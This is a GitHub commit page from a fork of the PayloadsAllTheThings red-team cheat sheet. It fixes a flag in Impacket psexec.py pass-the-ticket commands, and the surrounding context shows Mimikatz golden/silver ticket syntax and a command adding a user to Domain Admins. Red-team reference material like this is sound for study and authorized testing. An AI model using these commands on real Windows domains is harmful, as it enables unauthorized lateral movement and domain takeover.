forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Alex Zeecka
authored
Apr 3, 2019
1 parent
187762f
commit 4b79b86
Showing
1 changed file
with
3 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -348,7 +348,7 @@ cat $KRB5CCNAME | |
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file | ||
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/[email protected] | ||
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/[email protected] | ||
``` | ||
|
||
### PassTheTicket Silver Tickets | ||
|
@@ -363,7 +363,7 @@ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARG | |
Then use the same steps as a Golden ticket | ||
misc::convert ccache ticket.kirbi | ||
export KRB5CCNAME=/home/user/ticket.ccache | ||
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/[email protected] | ||
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/[email protected] | ||
``` | ||
|
||
### Trust Tickets | ||
|
@@ -645,4 +645,4 @@ net group "Domain Admins" hacker2 /add /domain | |
* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) | ||
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) | ||
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) | ||
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) | ||
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) |